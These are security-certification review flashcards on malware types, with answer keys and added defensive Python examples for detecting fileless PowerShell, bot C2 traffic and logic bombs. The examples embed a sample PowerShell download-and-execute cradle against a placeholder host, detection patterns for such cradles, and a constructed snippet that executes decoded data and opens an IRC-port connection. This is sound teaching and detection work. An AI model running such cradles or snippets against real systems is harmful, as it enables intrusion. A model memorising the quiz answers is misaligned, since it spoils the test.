Chapter 3 Review Flashcards
1
Q
1. Gurvinder has been asked to assist a company that recently fired one of their developers. After the developer was terminated, the critical application that they had written for the organization stopped working and now displays a message reading "You shouldn't have fired me!" If the developer's access was terminated and the organization does not believe that they would have had access to any system or code after they left the organization, what type of malware should Gurvinder look for?
A. A RAT
B. A PUP
C. A logic bomb
D. A keylogger
A
C
2
Q
2. Naomi believes that an attacker has compromised a Windows workstation using a fileless malware package. What Windows scripting tool was most likely used to download and execute the malware?
A. VBScript
B. Python
C. Bash
D. PowerShell
A
D
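A fileless PowerShell infection usually leaves its trace in process-creation logging rather than on disk: a PowerShell command line with a hidden window, no profile, and a Base64 "encoded command" that unpacks to a download-and-execute cradle. The following is an added example, not part of the original flashcards, that decodes such command lines and scores them against common indicators. The event format (ParentImage= and CommandLine= fields), the indicator names, the thresholds and the sample events are all constructed for this illustration; example.invalid is a reserved test domain.

```python
"""Triage constructed process-creation events for fileless PowerShell cradles."""
import base64
import re

# Indicators commonly seen in PowerShell download-and-execute tradecraft.
# The labels are chosen for this example and are not a vendor taxonomy.
INDICATORS = {
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "no_profile": re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "base64_in_script": re.compile(r"frombase64string", re.I),
}
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
POWERSHELL = re.compile(r"(?:powershell|pwsh)(?:\.exe)?\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_event(line):
    """Score one process-creation event; None if it is not a PowerShell launch."""
    parent = re.search(r"ParentImage=(\S+)", line)
    cmd = re.search(r"CommandLine=(.*)$", line)
    if not cmd or not POWERSHELL.search(cmd.group(1)):
        return None
    cmdline = cmd.group(1)
    hits = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
    # Match indicators against the raw command line and the decoded script.
    text = cmdline + "\n" + (decoded or "")
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    if parent and parent.group(1).rsplit("\\", 1)[-1].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    # A cradle or IEX is worth a look on its own; an encoded command is only
    # flagged when it is paired with at least one other evasion indicator.
    suspicious = bool({"download_cradle", "invoke_expression"} & set(hits)) or (
        "encoded_command" in hits and len(hits) >= 2)
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits, "suspicious": suspicious}


def scan(events):
    """Return the analyses of every event that scored as suspicious."""
    results = [analyze_event(e) for e in events]
    return [r for r in results if r and r["suspicious"]]


# Constructed sample events. The encoded payload is built here so the example
# is self-contained; a real event would carry the Base64 blob verbatim.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01Z WS01 EventID=4688 ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "2024-05-01T10:02:17Z WS01 EventID=4688 ParentImage=C:\\Office\\WINWORD.EXE "
    f"CommandLine=powershell.exe -nop -w hidden -enc {_B64}",
    "2024-05-01T10:03:05Z WS01 EventID=4688 ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=notepad.exe C:\\Users\\naomi\\notes.txt",
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print("SUSPICIOUS:", ", ".join(r["hits"]))
        if r["decoded"]:
            print("  decoded script:", r["decoded"])
```

The benign backup script also uses -NoProfile, which is why a single indicator is never enough on its own; the Word-spawned, hidden, encoded cradle trips several at once, and decoding the blob is what turns "some PowerShell ran" into "a stager was fetched from this URL".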
3
Q
3. Scott notices that one of the systems on his network contacted a number of systems via encrypted web traffic, downloaded a handful of files, and then uploaded a large amount of data to a remote system. What type of infection should he look for?
A. A keylogger
B. A backdoor
C. A bot
D. A logic bomb
A
C
4
Q
4. Amanda notices traffic between her systems and a known malicious host on TCP port 6667. What type of traffic is she most likely detecting?
A. Command and control
B. A hijacked web browser
C. A RAT
D. A worm
A
A
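Questions 3 and 4 describe the two classic ways bot traffic shows up on the wire: periodic check-ins to a controller followed by bulk downloads and a large upload, and a connection to a blocklisted host on the IRC port (6667 was the original C2 channel for IRC botnets). The following is an added example, not part of the original flashcards, that scores outbound flow records against those indicators. The flow format (timestamp, source, destination, port, bytes out, bytes in), the blocklist, the thresholds and the sample flows are all constructed; addresses come from the RFC 5737 documentation ranges.

```python
"""Score outbound flows for bot/C2 behaviour (constructed format and data)."""
import statistics
from collections import defaultdict
from datetime import datetime

# Ports historically used by IRC-based C2; 6667 is the classic one.
IRC_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 7000}
KNOWN_BAD = {"203.0.113.45"}            # constructed blocklist entry
EXFIL_BYTES = 50 * 1024 * 1024           # a single flow pushing more than 50 MiB
BEACON_CV = 0.1                          # gap jitter below 10% looks like a timer


def parse_flow(line):
    """Parse 'timestamp src dst dport bytes_out bytes_in' into a dict."""
    ts, src, dst, dport, out, inb = line.split()
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "src": src, "dst": dst, "dport": int(dport),
            "bytes_out": int(out), "bytes_in": int(inb)}


def beacon_regularity(timestamps):
    """Coefficient of variation of the gaps between connections (small = periodic)."""
    if len(timestamps) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.mean(gaps)
    return statistics.pstdev(gaps) / mean if mean > 0 else None


def score_host(flows):
    """Return the set of indicators triggered by one internal host's flows."""
    hits = set()
    by_dst = defaultdict(list)
    for f in flows:
        if f["dst"] in KNOWN_BAD:
            hits.add("known_bad_host")
        if f["dport"] in IRC_PORTS:
            hits.add("irc_port")
        # Exfiltration: big outbound transfer with almost nothing coming back.
        if f["bytes_out"] > EXFIL_BYTES and f["bytes_out"] > 10 * f["bytes_in"]:
            hits.add("large_upload")
        by_dst[f["dst"]].append(f["ts"])
    for stamps in by_dst.values():
        cv = beacon_regularity(sorted(stamps))
        if cv is not None and cv < BEACON_CV:
            hits.add("periodic_beacon")
    return hits


def scan(lines):
    """Group flows by internal source; return {src: sorted indicators} for flagged hosts."""
    by_src = defaultdict(list)
    for line in lines:
        f = parse_flow(line)
        by_src[f["src"]].append(f)
    report = {}
    for src, flows in by_src.items():
        hits = score_host(flows)
        if hits:
            report[src] = sorted(hits)
    return report


# Constructed flow records: 'timestamp src dst dport bytes_out bytes_in'.
SAMPLE_FLOWS = [
    # 10.0.0.23 checks in with one host every 60 s over 443, pulls files from
    # two others, then pushes about 200 MiB to a fourth (the question 3 pattern).
    "2024-05-01T10:00:00Z 10.0.0.23 198.51.100.7 443 900 1400",
    "2024-05-01T10:01:00Z 10.0.0.23 198.51.100.7 443 910 1380",
    "2024-05-01T10:02:00Z 10.0.0.23 198.51.100.7 443 905 1410",
    "2024-05-01T10:03:00Z 10.0.0.23 198.51.100.7 443 920 1395",
    "2024-05-01T10:03:05Z 10.0.0.23 198.51.100.8 443 2100 4800000",
    "2024-05-01T10:03:09Z 10.0.0.23 198.51.100.9 443 1900 6200000",
    "2024-05-01T10:04:30Z 10.0.0.23 192.0.2.99 443 210000000 4000",
    # 10.0.0.41 talks to a blocklisted host on 6667 (the question 4 pattern).
    "2024-05-01T10:02:11Z 10.0.0.41 203.0.113.45 6667 1200 3400",
    # 10.0.0.50 is ordinary browsing and should not be flagged.
    "2024-05-01T10:00:10Z 10.0.0.50 198.51.100.200 443 800 120000",
    "2024-05-01T10:04:33Z 10.0.0.50 198.51.100.200 443 650 95000",
    "2024-05-01T10:05:02Z 10.0.0.50 198.51.100.200 443 700 88000",
]

if __name__ == "__main__":
    for src, hits in scan(SAMPLE_FLOWS).items():
        print(src, "->", ", ".join(hits))
```

Note that the encrypted web traffic in question 3 is flagged purely on timing and volume, since the payload is opaque, while the question 4 host is caught on destination and port alone; a real pipeline would feed a threat-intelligence blocklist into KNOWN_BAD rather than a single literal.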
5
Q
5. Mike discovers that attackers have left software that allows them to have remote access to systems on a computer in his company's network. How should he describe or classify this malware?
A. A worm
B. Crypto malware
C. A Trojan
D. A backdoor
A
D
6
Q
6. Naomi wants to provide guidance on how to keep her organization's new machine learning tools secure. Which of the following is not a common means of securing machine learning algorithms?
A. Understand the quality of the source data
B. Build a secure working environment for ML developers
C. Require third-party review for bias in ML algorithms
D. Ensure changes to ML algorithms are reviewed and tested
A
C
7
Q
7. What type of malware is adware typically classified as?
A. A DOG
B. A backdoor
C. A PUP
D. A rootkit
A
C
8
Q
8. Matt uploads a malware sample to a third-party malware scanning site that uses multiple antimalware and antivirus engines to scan the sample. He receives several different answers for what the malware package is. What has occurred?
A. The package contains more than one piece of malware.
B. The service is misconfigured.
C. The malware is polymorphic and changed while being tested.
D. Different vendors use different names for malware packages.
A
D
9
Q
9. Nancy is concerned that there is a software keylogger on the system she is investigating. What data may have been stolen?
A. All files on the system
B. All keyboard input
C. All files the user accessed while the keylogger was active
D. Keyboard and other input from the user
A
D
10
Q
10. Crypto malware is a type of what sort of malware?
A. Worms
B. PUP
C. Ransomware
D. Rootkit
A
C
11
Q
11. Rick believes that a system he is responsible for has been compromised with malware that uses a rootkit to obtain and retain access to the system. When he runs a virus scan, the system doesn't show any malware. If he has other data that indicates the system is infected, what should his next step be if he wants to determine what malware may be on the system?
A. Rerun the antimalware scan.
B. Mount the drive on another system and scan it that way.
C. Disable the system's antivirus because it may be causing a false negative.
D. The system is not infected and he should move on.
A
B
12
Q
12. Tracy is concerned about attacks against the machine learning algorithm that her organization is using to assess their network. What step should she take to ensure that her baseline data is not tainted?
A. She should scan all systems on the network for vulnerabilities and remediate them before using the algorithm.
B. She should run the ML algorithm on the network only if she believes it is secure.
C. She should disable outbound and inbound network access so that only normal internal traffic is validated.
D. She should disable all firewall rules so that all potential traffic can be validated.
A
B
13
Q
13. Selah wants to ensure that malware is completely removed from a system. What should she do to ensure this?
A. Run multiple antimalware tools and use them to remove all detections.
B. Wipe the drive and reinstall from known good media.
C. Use the delete setting in her antimalware software rather than the quarantine setting.
D. There is no way to ensure the system is safe and it should be destroyed.
A
B
14
Q
14. What type of malware is frequently called stalkerware because of its use by those in intimate relationships to spy on their partners?
A. Worms
B. RATs
C. Crypto malware
D. PUPs
A
B
15
Q
15. Ben wants to analyze Python code that he believes may be malicious code written by an employee of his organization. What can he do to determine if the code is malicious?
A. Run a decompiler against it to allow him to read the code.
B. Open the file using a text editor to review the code.
C. Test the code using an antivirus tool.
D. Submit the Python code to a malware testing website.
A
B
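Because Python source is already readable, the practical next step after opening it in an editor is a quick static triage for the constructs insider malware tends to use: dynamic execution of decoded data, shell or network calls, and a date or time check guarding them (the logic-bomb trigger from question 1). The following is an added example, not part of the original flashcards, that walks a file's syntax tree and reports those patterns with line numbers. The indicator sets and the sample source are constructed for this illustration; the Base64 blob in the sample decodes to the text "import os".

```python
"""Static triage of Python source for insider-malware patterns (added example)."""
import ast

DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__", "importlib.import_module"}
DECODERS = {"base64.b64decode", "base64.b32decode", "codecs.decode",
            "zlib.decompress", "marshal.loads"}
NETWORK_OR_SHELL = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
                    "subprocess.call", "subprocess.check_output", "socket.socket",
                    "socket.create_connection", "urllib.request.urlopen",
                    "requests.get", "requests.post"}
TIME_SOURCES = {"date.today", "datetime.today", "datetime.now", "datetime.date.today",
                "datetime.datetime.now", "time.time"}
RISKY_MODULES = {"socket", "subprocess", "ctypes", "marshal"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _calls_in(node):
    """Dotted names of every call inside a subtree."""
    return {_dotted(c.func) for c in ast.walk(node) if isinstance(c, ast.Call)}


class Triage(ast.NodeVisitor):
    """Collect (lineno, kind, detail) findings while walking the tree."""

    def __init__(self):
        self.findings = []
        self._time_guards = 0   # depth of enclosing if-statements keyed on date/time

    def _note(self, node, kind, detail):
        self.findings.append((node.lineno, kind, detail))

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name.split(".")[0] in RISKY_MODULES:
                self._note(node, "risky_import", alias.name)
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        if (node.module or "").split(".")[0] in RISKY_MODULES:
            self._note(node, "risky_import", node.module)
        self.generic_visit(node)

    def visit_If(self, node):
        guarded = bool(_calls_in(node.test) & TIME_SOURCES)
        self._time_guards += guarded
        self.generic_visit(node)
        self._time_guards -= guarded

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name in DYNAMIC_EXEC:
            self._note(node, "dynamic_exec", name)
            if _calls_in(node) & DECODERS:
                self._note(node, "exec_of_decoded_data", name)
        elif name in NETWORK_OR_SHELL:
            self._note(node, "network_or_shell", name)
        if name in DYNAMIC_EXEC | NETWORK_OR_SHELL and self._time_guards:
            self._note(node, "time_triggered", name)
        self.generic_visit(node)


def triage(source):
    """Parse source and return its findings as (lineno, kind, detail) tuples."""
    visitor = Triage()
    visitor.visit(ast.parse(source))
    return visitor.findings


# Constructed sample: a "maintenance helper" with a date-keyed exec of
# decoded data and an IRC-port connection outside the guard.
SAMPLE_SOURCE = '''import base64, socket
from datetime import date

def cleanup(path):
    """Tidies temporary files."""
    if date.today() > date(2024, 6, 1):
        exec(base64.b64decode("aW1wb3J0IG9z").decode())
    s = socket.create_connection(("203.0.113.45", 6667))
    s.sendall(b"hello")
'''

if __name__ == "__main__":
    for lineno, kind, detail in triage(SAMPLE_SOURCE):
        print(f"line {lineno}: {kind} ({detail})")
```

The visitor tracks how deep it is inside date-guarded branches, so the exec on line 7 is reported as time_triggered while the socket call on line 8, which sits outside the if, is not; that distinction is exactly what separates a logic bomb from code that merely has network access.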